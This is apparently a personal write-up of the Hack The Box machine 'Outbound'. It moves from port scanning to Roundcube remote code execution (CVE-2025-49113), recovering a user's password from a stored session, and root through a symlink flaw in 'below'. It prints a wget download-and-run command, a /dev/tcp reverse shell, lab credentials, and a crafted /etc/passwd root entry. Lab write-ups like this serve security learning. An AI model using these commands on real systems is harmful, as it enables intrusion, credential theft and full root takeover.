OutBound (HTB)

Intro

Hello everyone new HTB seasonal machine outbound let's get right into it.

Enumeration.

Port scanning.

# Nmap 7.97 scan initiated Mon Jul 14 01:55:25 2025 as: nmap -vvv -p 22,80 -4 -sC -sV -vv -o scan.nmap 10.10.11.77
Nmap scan report for mail.outbound.htb (10.10.11.77)
Host is up, received syn-ack (0.014s latency).
Scanned at 2025-07-14 01:55:25 +08 for 8s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBN9Ju3bTZsFozwXY1B2KIlEY4BA+RcNM57w4C5EjOw1QegUUyCJoO4TVOKfzy/9kd3WrPEj/FYKT2agja9/PM44=
|   256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIH9qI0OvMyp03dAGXR0UPdxw7hjSwMR773Yb9Sne+7vD
80/tcp open  http    syn-ack nginx 1.24.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-favicon: Unknown favicon MD5: 924A68D347C80D0E502157E83812BB23
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Roundcube Webmail :: Welcome to Roundcube Webmail
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 14 01:55:33 2025 -- 1 IP address (1 host up) scanned in 7.74 seconds

Normal stuff ssh and http let's see what we have in the website.

HTTP

So we have a Reoundcube webmail.

Roundcube is a free, open-source webmail client written in PHP. It allows users to access their email via a web browser, using standard IMAP and SMTP to communicate with the mail server

Let's do not forgot that we already previded with crednation like i have not waste 30 min looking for a way in LOL.

tyler / LhKL1o9Nm3X2

We can login using that. After we login nothing interesting so i start searching for CVEs but first we need to know the version if possible !. And i found it if you view the source of the main page after login you going to see a lot of JavaScript code look for "rcversion":10610," which is version 1.6.10. Looking for know CVEs we can find this one...

Exploit for Roundcube 1.6.10 - Remote Code Execution (RCE) CVE-2025-49113Sploitus_com

The exploit basically is due to PHP serialization we can inject php commands and therefor we can execute system command which allow us to get shell on the machine. You can use this Metasploit exploit there but i used this one.

CVE-2025-49113/CVE-2025-49113.php at main · fearsoff-org/CVE-2025-49113GitHub

using this command i was able to get shell on the system

php exploit.php http://mail.outbound.htb "tyler" "LhKL1o9Nm3X2" 'wget http://10.10.16.111:8000/exploit.sh -O /tmp/ex.sh && chmod +x /tmp/ex.sh && bash /tmp/ex.sh'

Basiccly we just uploading out bash script into the machine which just going to reverse shell to machine.

And this is the content for exploit.sh

sh -i >& /dev/tcp/10.10.16.111/9001 0>&1

Also do not forgot to start listener on port 9001.

once again.

And here once again i forgot that we have tyler password and start playing around but we can use the same password for login into roundcube to login as Tyler in the machine.

One more thing. This machine does not have python so you can not stable the shell using

python3 -c 'impoty pty; pty.spawn("/bin/bash")' 

But we can using the script command.

script /dev/null -qc bash

This will stable out shell.,

Shell as jacob

So after i got shell as tyler i start looking around specilly out the email that he has since we have port 25,998,995 and all of these used for email.

But nothing was there. So looked at the database (i have already looked at it before i got Tyler because i forgot that we have the password). There is a users table which does not include anything that is interesting. But there is a session table. The session table hold the sessions for imap. And through my search i came across that imap sessions may hold the clear text password and a lot of info regarding the current logged in user. So we can see this session in the table.

bGFuZ3VhZ2V8czo1OiJlbl9VUyI7aW1hcF9uYW1lc3BhY2V8YTo0OntzOjg6InBlcnNvbmFsIjthOjE6e2k6MDthOjI6e2k6MDtzOjA6IiI7aToxO3
M6MToiLyI7fX1zOjU6Im90aGVyIjtOO3M6Njoic2hhcmVkIjtOO3M6MTA6InByZWZpeF9vdXQiO3M6MDoiIjt9aW1hcF9kZWxpbWl0ZXJ8czoxOiIvIjtpbWFwX2xpc3RfY29uZnxhOjI6e2k
6MDtOO2k6MTthOjA6e319dXNlcl9pZHxpOjE7dXNlcm5hbWV8czo1OiJqYWNvYiI7c3RvcmFnZV9ob3N0fHM6OToibG9jYWxob3N0IjtzdG9yYWdlX3BvcnR8aToxNDM7c3RvcmFnZV9zc2x8
YjowO3Bhc3N3b3JkfHM6MzI6Ikw3UnYwMEE4VHV3SkFyNjdrSVR4eGNTZ25JazI1QW0vIjtsb2dpbl90aW1lfGk6MTc0OTM5NzExOTt0aW1lem9uZXxzOjEzOiJFdXJvcGUvTG9uZG9uIjtTV
E9SQUdFX1NQRUNJQUwtVVNFfGI6MTthdXRoX3NlY3JldHxzOjI2OiJEcFlxdjZtYUk5SHhETDVHaGNDZDhKYVFRVyI7cmVxdWVzdF90b2tlbnxzOjMyOiJUSXNPYUFCQTF6SFNYWk9CcEg2dX
A1WEZ5YXlOUkhhdyI7dGFza3xzOjQ6Im1haWwiO3NraW5fY29uZmlnfGE6Nzp7czoxNzoic3VwcG9ydGVkX2xheW91dHMiO2E6MTp7aTowO3M6MTA6IndpZGVzY3JlZW4iO31zOjIyOiJqcXV
lcnlfdWlfY29sb3JzX3RoZW1lIjtzOjk6ImJvb3RzdHJhcCI7czoxODoiZW1iZWRfY3NzX2xvY2F0aW9uIjtzOjE3OiIvc3R5bGVzL2VtYmVkLmNzcyI7czoxOToiZWRpdG9yX2Nzc19sb2Nh
dGlvbiI7czoxNzoiL3N0eWxlcy9lbWJlZC5jc3MiO3M6MTc6ImRhcmtfbW9kZV9zdXBwb3J0IjtiOjE7czoyNjoibWVkaWFfYnJvd3Nlcl9jc3NfbG9jYXRpb24iO3M6NDoibm9uZSI7czoyM
ToiYWRkaXRpb25hbF9sb2dvX3R5cGVzIjthOjM6e2k6MDtzOjQ6ImRhcmsiO2k6MTtzOjU6InNtYWxsIjtpOjI7czoxMDoic21hbGwtZGFyayI7fX1pbWFwX2hvc3R8czo5OiJsb2NhbGhvc3
QiO3BhZ2V8aToxO21ib3h8czo1OiJJTkJPWCI7c29ydF9jb2x8czowOiIiO3NvcnRfb3JkZXJ8czo0OiJERVNDIjtTVE9SQUdFX1RIUkVBRHxhOjM6e2k6MDtzOjEwOiJSRUZFUkVOQ0VTIjt
pOjE7czo0OiJSRUZTIjtpOjI7czoxNDoiT1JERVJFRFNVQkpFQ1QiO31TVE9SQUdFX1FVT1RBfGI6MDtTVE9SQUdFX0xJU1QtRVhURU5ERUR8YjoxO2xpc3RfYXR0cmlifGE6Njp7czo0OiJu
YW1lIjtzOjg6Im1lc3NhZ2VzIjtzOjI6ImlkIjtzOjExOiJtZXNzYWdlbGlzdCI7czo1OiJjbGFzcyI7czo0MjoibGlzdGluZyBtZXNzYWdlbGlzdCBzb3J0aGVhZGVyIGZpeGVkaGVhZGVyI
jtzOjE1OiJhcmlhLWxhYmVsbGVkYnkiO3M6MjI6ImFyaWEtbGFiZWwtbWVzc2FnZWxpc3QiO3M6OToiZGF0YS1saXN0IjtzOjEyOiJtZXNzYWdlX2xpc3QiO3M6MTQ6ImRhdGEtbGFiZWwtbX
NnIjtzOjE4OiJUaGUgbGlzdCBpcyBlbXB0eS4iO311bnNlZW5fY291bnR8YToyOntzOjU6IklOQk9YIjtpOjI7czo1OiJUcmFzaCI7aTowO31mb2xkZXJzfGE6MTp7czo1OiJJTkJPWCI7YTo
yOntzOjM6ImNudCI7aToyO3M6NjoibWF4dWlkIjtpOjM7fX1saXN0X21vZF9zZXF8czoyOiIxMCI7

After decode it as this is a Base 64 encoding we can find out that this is jacobs' session. And we indeed have a password in there.

L7Rv00A8TuwJAr67kITxxcSgnIk25Am/

But what is this password. This password in my initial thoughts was a DES password becuase i found this in the config.

// This key is used to encrypt the users imap password which is stored
// in the session record. For the default cipher method it must be
// exactly 24 characters long.
// YOUR KEY MUST BE DIFFERENT THAN THE SAMPLE VALUE FOR SECURITY REASONS
$config['des_key'] = 'rcmail-!24ByteDESkey*Str';

So i tired to use DES, Triple DES to crack it but no luck. After some search i came across this.

https://github.com/roundcube/roundcubemail/blob/master/bin/decrypt.sh

This is a script that exist within roundcube to decrypt the passwords so i tried it and it worked.

Then we have shell as jacob.

But here where it got funnier i checked the webmail and login with jacobs' cred and found 2 emails one about below and the second about password reset and there i just stopped i have no clud what to do next nor with the password i found in the email. With some hint i checked the open ports then i reilized that this docker is not the main machine as it does not have ssh open 😂. Then i figure that i could use jacobs' creds to login via ssh. But also does not work then i tried the password in the mail THEN it worked finally and got the first flag.

shell as root.

From the emails we found for Jacob we already know what we need to do. In the ssh session using sudo -l we can see that we can run below as root with no password. Also by default below runs as root. So looking at the GitHub repo under security we can see on critical vulnerability an interesting one actually.

here is the link first.

Incorrect Permission Assignment for Critical Resource in belowGitHub

So basiclly what happen is that under /var/log/below any user can create any file world-write permissions it called and via that we can create symbolic link from the error file to the /etc/passwd enabling us to write to the passwd file and therefor grant us root user and root access. Such an interesting flow.

So let's exploit it.

First we need to navigate to the /var/log/below and create symbolic link like so.

ln -sf /etc/passwd /var/log/below/error_root.log

After we do so any error going to go in this file so we need to generate an error contain an entry of our new root user.

sudo below replay --time '
pythonic:$6$Fd.GMy5CXkINzQqk$uE8tJZpKEb2Xr2Mby7QBg0OOvG5p/7nKZeUHlxId04X6/XaYXYCeWCOaG6and4C5SDYCmo1pFMdQprQCJuMb51:0:0:root:/root:/bin/bash
'

This is the command i used. Also if you would like to generate password for Linux like that you can use openssl

openssl passwd -6 <PASSWORD>

After we execute the command we just need to login int our new user su pythonic and we should be root.

And just like that we are roooooot now. EASY.

conclusion

This machine was quite fun and tricky i did not used to creds before hack spacilly in linux but we learn also i have learned more about IMAP, POP, SMTP more commands in enumeration which is good. Also the below exploit was fun to exploit. Thank you for reading :) 💓.